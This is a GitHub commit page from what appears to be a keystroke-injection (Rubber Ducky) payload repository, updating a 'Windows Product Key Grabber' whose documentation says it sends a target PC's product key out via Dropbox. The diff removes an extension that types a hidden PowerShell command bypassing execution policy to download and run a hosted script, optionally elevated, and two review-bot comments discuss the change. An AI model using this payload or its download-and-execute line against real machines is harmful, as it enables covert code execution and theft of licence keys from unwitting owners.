Merge pull request #474 from PlumpyTurkey/master

Fix “Windows Product Key Grabber” payload
pull/476/head
Peaks 2024-08-23 05:27:29 -04:00 committed by GitHub
commit ad08ba6e36
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 2 additions and 37 deletions

@ -8,7 +8,7 @@
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
</a>
<a href="#">
<img alt="VERSION: 1.1" src="https://img.shields.io/badge/VERSION-1.1-green?style=for-the-badge">
<img alt="VERSION: 1.2" src="https://img.shields.io/badge/VERSION-1.2-green?style=for-the-badge">
</a>
</p>

@ -3,7 +3,7 @@ REM_BLOCK DOCUMENTATION
Author: PlumpyTurkey
Description: This payload sends you the target PC's Windows product key via Dropbox.
Target: Windows 10, 11
Version: 1.1
Version: 1.2
Category: Exfiltration
END_REM
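Review bot: The Version field in this REM_BLOCK goes from 1.1 to 1.2 with no record of what changed between the two. Add a one-line change note to the documentation block or the README so a reader can tell which revision carries the fix, and keep this value in step with the VERSION badge changed in the README hunk.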
@ -108,39 +108,4 @@ EXTENSION WINDOWS_ONLY
END_IF
END_EXTENSION
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.0
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_EXTENSION
RHP_RUN()
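Review bot: The commit title says only "Fix", while this hunk's header shrinks the end of the file from 39 lines to 4 around the RUN_HOSTED_POWERSHELL extension, and nothing states why. Say in the commit message whether this drops a duplicated copy of the block or the extension itself, and confirm that whatever remains in the file does not leave the RHP_RUN() call or the #RHP_SCRIPT_URL option without a matching definition.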